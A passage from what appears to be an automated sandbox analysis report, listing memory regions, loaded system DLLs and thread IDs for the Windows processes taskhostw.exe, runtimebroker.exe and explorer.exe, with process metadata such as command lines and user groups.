entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2685 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2686 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2687 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2688 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2689 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 2690 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 2691 start_va = 0x7ff623690000 end_va = 0x7ff6236a8fff monitored = 0 entry_point = 0x7ff6236959b0 region_type = mapped_file name = "taskhostw.exe" filename = "\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe") Region: id = 2692 start_va = 0x7fffb5030000 end_va = 0x7fffb51f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2693 start_va = 0x460000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 2694 start_va = 0x7fffb1b20000 end_va = 0x7fffb1d07fff monitored = 0 entry_point = 0x7fffb1b4ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2695 start_va = 0x7fffb3fa0000 end_va = 0x7fffb404cfff monitored = 0 entry_point = 0x7fffb3fb81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2696 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2697 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 2698 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2699 start_va = 0x7fffb3a90000 end_va = 0x7fffb3b2cfff monitored = 0 entry_point = 0x7fffb3a978a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2700 start_va = 0x560000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 2701 start_va = 0x7fffb42d0000 end_va = 0x7fffb43ebfff monitored = 0 entry_point = 0x7fffb43102b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2702 start_va = 0x7fffb4860000 end_va = 0x7fffb4adcfff monitored = 0 entry_point = 0x7fffb4934970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2703 start_va = 0x7fffb1ab0000 end_va = 0x7fffb1b19fff monitored = 0 entry_point = 0x7fffb1ae6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2704 start_va = 0x7fffb2460000 end_va = 0x7fffb2520fff monitored = 0 entry_point = 0x7fffb2480da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2705 start_va = 0x400000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2707 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2708 start_va = 0x5e0000 end_va = 0x722fff monitored = 0 entry_point = 0x608210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2709 start_va = 0x5e0000 end_va = 0x6bcfff monitored = 0 entry_point = 0x63e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2710 start_va = 0x7fffb16d0000 end_va = 0x7fffb16defff monitored = 0 entry_point = 0x7fffb16d3210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2711 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2714 start_va = 0x7fffb4050000 end_va = 0x7fffb40aafff monitored = 0 entry_point = 0x7fffb40638b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2718 start_va = 0x5e0000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 2719 start_va = 0x7fffb4700000 end_va = 0x7fffb4855fff monitored = 0 entry_point = 0x7fffb470a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2720 start_va = 0x7fffb3b40000 end_va = 0x7fffb3cc5fff monitored = 0 entry_point = 0x7fffb3b8ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2721 start_va = 0x400000 end_va = 0x438fff monitored = 0 entry_point = 0x4012f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2722 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 2723 start_va = 0x660000 end_va = 0x7e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 2724 start_va = 0x7fffb3f60000 end_va = 0x7fffb3f9afff monitored = 0 entry_point = 0x7fffb3f612f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2725 start_va = 0x7f0000 end_va = 0x970fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 2726 start_va = 0x980000 end_va = 0x1d7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 2727 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2728 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2729 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskhostw.exe.mui" filename = "\\Windows\\System32\\en-US\\taskhostw.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskhostw.exe.mui") Region: id = 2730 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2731 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 2732 start_va = 0x7fffaffd0000 end_va = 0x7fffb0065fff monitored = 0 entry_point = 0x7fffafff5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2733 start_va = 0x1d80000 end_va = 0x1eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d80000" filename = "" Region: id = 2738 start_va = 0x7fffb43f0000 end_va = 0x7fffb4549fff monitored = 0 entry_point = 0x7fffb44338e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2741 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 2742 start_va = 0x1d80000 end_va = 0x1e3bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d80000" filename = "" Region: id = 2743 start_va = 0x1ea0000 end_va = 0x1eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 2744 start_va = 0x420000 end_va = 0x423fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 2745 start_va = 0x7fffaf5e0000 end_va = 0x7fffaf601fff monitored = 0 entry_point = 0x7fffaf5e1a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 2746 start_va = 0x1eb0000 end_va = 0x1f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001eb0000" filename = "" Region: id = 2747 start_va = 0x430000 end_va = 0x430fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 2748 start_va = 0x7fffb3e50000 end_va = 0x7fffb3ef6fff monitored = 0 entry_point = 0x7fffb3e5b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2749 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2750 start_va = 0x7fffa90c0000 end_va = 0x7fffa91b8fff monitored = 0 entry_point = 0x7fffa9108000 region_type = mapped_file name = "settingsynccore.dll" filename = "\\Windows\\System32\\SettingSyncCore.dll" (normalized: "c:\\windows\\system32\\settingsynccore.dll") Region: id = 2751 start_va = 0x1e40000 end_va = 0x1e41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e40000" filename = "" Region: id = 2752 start_va = 0x7fffb16e0000 end_va = 0x7fffb1794fff monitored = 0 entry_point = 0x7fffb17222e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2753 start_va = 0x7fffb1650000 end_va = 0x7fffb1663fff monitored = 0 entry_point = 0x7fffb16552e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2754 start_va = 0x7fffb4f80000 end_va = 0x7fffb5026fff monitored = 0 entry_point = 0x7fffb4f958d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2755 start_va = 0x7fffb14e0000 end_va = 0x7fffb1508fff monitored = 0 entry_point = 0x7fffb14f4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2756 start_va = 0x7fffb0fd0000 end_va = 0x7fffb0fe6fff monitored = 0 entry_point = 0x7fffb0fd79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2762 start_va = 0x7fffa8ff0000 end_va = 0x7fffa90bdfff monitored = 0 entry_point = 0x7fffa90214c0 region_type = mapped_file name = "tokenbroker.dll" filename = "\\Windows\\System32\\TokenBroker.dll" (normalized: "c:\\windows\\system32\\tokenbroker.dll") Region: id = 2763 start_va = 0x7fffac890000 end_va = 0x7fffac9c5fff monitored = 0 entry_point = 0x7fffac8bf350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 2764 start_va = 0x1f30000 end_va = 0x200cfff monitored = 0 entry_point = 0x1f8e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2765 start_va = 0x1f30000 end_va = 0x1faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f30000" filename = "" Region: id = 2766 start_va = 0x1fb0000 end_va = 0x202ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 2767 start_va = 0x2030000 end_va = 0x20affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 2838 start_va = 0x7fffaed20000 end_va = 0x7fffaf1b2fff monitored = 0 entry_point = 0x7fffaed2f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 2840 start_va = 0x1e50000 end_va = 0x1e7dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e50000" filename = "" Region: id = 2857 start_va = 0x7fffab340000 end_va = 0x7fffab380fff monitored = 0 entry_point = 0x7fffab344840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Thread: id = 207 os_tid = 0x608 Thread: id = 208 os_tid = 0x610 Thread: id = 210 os_tid = 0x618 Thread: id = 211 os_tid = 0x61c Thread: id = 212 os_tid = 0x620 Thread: id = 214 os_tid = 0x628 Thread: id = 215 os_tid = 0x62c Process: id = "14" image_name = "runtimebroker.exe" filename = "c:\\windows\\system32\\runtimebroker.exe" page_root = "0x30c09000" os_pid = "0x630" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "13" os_parent_pid = "0x268" cmd_line = "C:\\Windows\\System32\\RuntimeBroker.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f256" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2788 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2789 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2790 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2791 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2792 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2793 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2794 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2795 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2796 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2797 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2798 start_va = 0x1f0000 end_va = 0x1f6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2799 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2800 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2801 start_va = 0x480000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 2802 start_va = 0x500000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 2803 start_va = 0x580000 end_va = 0x586fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 2804 start_va = 0x600000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 2805 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 2806 start_va = 0x800000 end_va = 0x987fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 2807 start_va = 0x990000 end_va = 0xb10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 2808 start_va = 0xb20000 end_va = 0x1f1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 2809 start_va = 0x1f20000 end_va = 0x1f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f20000" filename = "" Region: id = 2810 start_va = 0x1fa0000 end_va = 0x201ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 2811 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2812 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 2813 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 2814 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 2815 start_va = 0x7ff727b40000 end_va = 0x7ff727b56fff monitored = 0 entry_point = 0x7ff727b444f0 region_type = mapped_file name = "runtimebroker.exe" filename = "\\Windows\\System32\\RuntimeBroker.exe" (normalized: "c:\\windows\\system32\\runtimebroker.exe") Region: id = 2816 start_va = 0x7fffb1670000 end_va = 0x7fffb16bafff monitored = 0 entry_point = 0x7fffb16735f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2817 start_va = 0x7fffb16d0000 end_va = 0x7fffb16defff monitored = 0 entry_point = 0x7fffb16d3210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2818 start_va = 0x7fffb1ab0000 end_va = 0x7fffb1b19fff monitored = 0 entry_point = 0x7fffb1ae6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2819 start_va = 0x7fffb1b20000 end_va = 0x7fffb1d07fff monitored = 0 entry_point = 0x7fffb1b4ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2820 start_va = 0x7fffb3a90000 end_va = 0x7fffb3b2cfff monitored = 0 entry_point = 0x7fffb3a978a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2821 start_va = 0x7fffb3b40000 end_va = 0x7fffb3cc5fff monitored = 0 entry_point = 0x7fffb3b8ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2822 start_va = 0x7fffb3e50000 end_va = 0x7fffb3ef6fff monitored = 0 entry_point = 0x7fffb3e5b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2823 start_va = 0x7fffb3f60000 end_va = 0x7fffb3f9afff monitored = 0 entry_point = 0x7fffb3f612f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2824 start_va = 0x7fffb3fa0000 end_va = 0x7fffb404cfff monitored = 0 entry_point = 0x7fffb3fb81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2825 start_va = 0x7fffb4050000 end_va = 0x7fffb40aafff monitored = 0 entry_point = 0x7fffb40638b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2826 start_va = 0x7fffb42d0000 end_va = 0x7fffb43ebfff monitored = 0 entry_point = 0x7fffb43102b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2827 start_va = 0x7fffb45b0000 end_va = 0x7fffb46f2fff monitored = 0 entry_point = 0x7fffb45d8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2828 start_va = 0x7fffb4700000 end_va = 0x7fffb4855fff monitored = 0 entry_point = 0x7fffb470a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2829 start_va = 0x7fffb4860000 end_va = 0x7fffb4adcfff monitored = 0 entry_point = 0x7fffb4934970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2830 start_va = 0x7fffb5030000 end_va = 0x7fffb51f0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2831 start_va = 0x7fffa8ff0000 end_va = 0x7fffa90bdfff monitored = 0 entry_point = 0x7fffa90214c0 region_type = mapped_file name = "tokenbroker.dll" filename = "\\Windows\\System32\\TokenBroker.dll" (normalized: "c:\\windows\\system32\\tokenbroker.dll") Region: id = 2832 start_va = 0x7fffb2460000 end_va = 0x7fffb2520fff monitored = 0 entry_point = 0x7fffb2480da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2833 start_va = 0x7fffb16e0000 end_va = 0x7fffb1794fff monitored = 0 entry_point = 0x7fffb17222e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2834 start_va = 0x7fffb14e0000 end_va = 0x7fffb1508fff monitored = 0 entry_point = 0x7fffb14f4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2835 start_va = 0x7fffac890000 end_va = 0x7fffac9c5fff monitored = 0 entry_point = 0x7fffac8bf350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 2837 start_va = 0x7fffaed20000 end_va = 0x7fffaf1b2fff monitored = 0 entry_point = 0x7fffaed2f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 2848 start_va = 0x7fffafcd0000 end_va = 0x7fffafce2fff monitored = 0 entry_point = 0x7fffafcd2760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2851 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2852 start_va = 0x7fffaa8d0000 end_va = 0x7fffaa8f7fff monitored = 0 entry_point = 0x7fffaa8d8c10 region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Region: id = 2853 start_va = 0x7fffb4f80000 end_va = 0x7fffb5026fff monitored = 0 entry_point = 0x7fffb4f958d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2854 start_va = 0x7fffafc70000 end_va = 0x7fffafc8bfff monitored = 0 entry_point = 0x7fffafc737a0 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 2855 start_va = 0x590000 end_va = 0x5bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Thread: id = 220 os_tid = 0x658 Thread: id = 221 os_tid = 0x654 Thread: id = 222 os_tid = 0x650 Thread: id = 223 os_tid = 0x640 Thread: id = 224 os_tid = 0x63c Thread: id = 225 os_tid = 0x634 Process: id = "15" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x3ef2c000" os_pid = "0x6b0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "12" os_parent_pid = "0x688" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f256" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2889 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2890 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2891 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2892 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2893 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 2894 start_va = 0xe0000 end_va = 0xe1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2895 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2896 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" 